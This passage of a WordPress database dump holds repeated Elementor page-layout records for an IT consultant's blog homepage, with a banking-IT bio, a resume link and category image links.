IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"d64d431\",\"elType\":\"widget\",\"settings\":{\"title\":\"My Resume\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/CV-DBA.pdf\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"__globals__\":{\"title_color\":\"globals\\/colors?id=accent\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}]'),
(4359,833,'_elementor_edit_mode','builder'),
(4360,833,'_elementor_template_type','wp-page'),
(4361,833,'_elementor_version','3.20.4'),
(4362,833,'_wp_page_template','default'),
(4363,833,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"classic_meta_separator\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\",\"classic_box_bg_color\":\"\",\"classic_title_color\":\"globals\\/colors?id=accent\",\"classic_meta_color\":\"globals\\/colors?id=text\",\"classic_excerpt_color\":\"globals\\/colors?id=text\",\"classic_read_more_color\":\"globals\\/colors?id=secondary\"},\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":25,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_column_gap\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"classic_row_gap\":{\"unit\":\"px\",\"size\":23,\"sizes\":[]},\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_img_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"classic_box_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"classic_image_spacing\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"classic_title_color\":\"#0074FF\",\"cards_card_bg_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(4364,833,'_elementor_pro_version','3.13.2'),
(4365,833,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4369,834,'_elementor_edit_mode','builder'),
(4370,834,'_elementor_template_type','wp-page'),
(4371,834,'_elementor_version','3.20.4'),
(4372,834,'_wp_page_template','default'),
(4373,834,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"classic_meta_separator\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\",\"classic_box_bg_color\":\"\",\"classic_title_color\":\"globals\\/colors?id=accent\",\"classic_meta_color\":\"globals\\/colors?id=text\",\"classic_excerpt_color\":\"globals\\/colors?id=text\",\"classic_read_more_color\":\"globals\\/colors?id=secondary\"},\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":25,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_column_gap\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"classic_row_gap\":{\"unit\":\"px\",\"size\":23,\"sizes\":[]},\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_img_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"classic_box_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"classic_image_spacing\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"classic_title_color\":\"#0074FF\",\"cards_card_bg_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(4374,834,'_elementor_pro_version','3.13.2'),
(4375,834,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4379,835,'_elementor_edit_mode','builder'),
(4380,835,'_elementor_template_type','wp-page'),
(4381,835,'_elementor_version','3.20.4'),
(4382,835,'_wp_page_template','default'),
(4383,835,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"classic_meta_separator\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\",\"classic_box_bg_color\":\"\",\"classic_title_color\":\"globals\\/colors?id=accent\",\"classic_meta_color\":\"globals\\/colors?id=text\",\"classic_excerpt_color\":\"globals\\/colors?id=text\",\"classic_read_more_color\":\"globals\\/colors?id=secondary\"},\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":25,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_column_gap\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"classic_row_gap\":{\"unit\":\"px\",\"size\":23,\"sizes\":[]},\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_img_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"classic_box_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"classic_image_spacing\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"classic_title_color\":\"#0074FF\",\"cards_card_bg_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(4384,835,'_elementor_pro_version','3.13.2'),
(4385,835,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(4433,838,'_elementor_edit_mode','builder'),
(4434,838,'_elementor_template_type','wp-page'),
(4435,838,'_elementor_version','3.28.3'),
(4436,838,'_wp_page_template','default'),
(4437,838,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"classic_meta_separator\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More 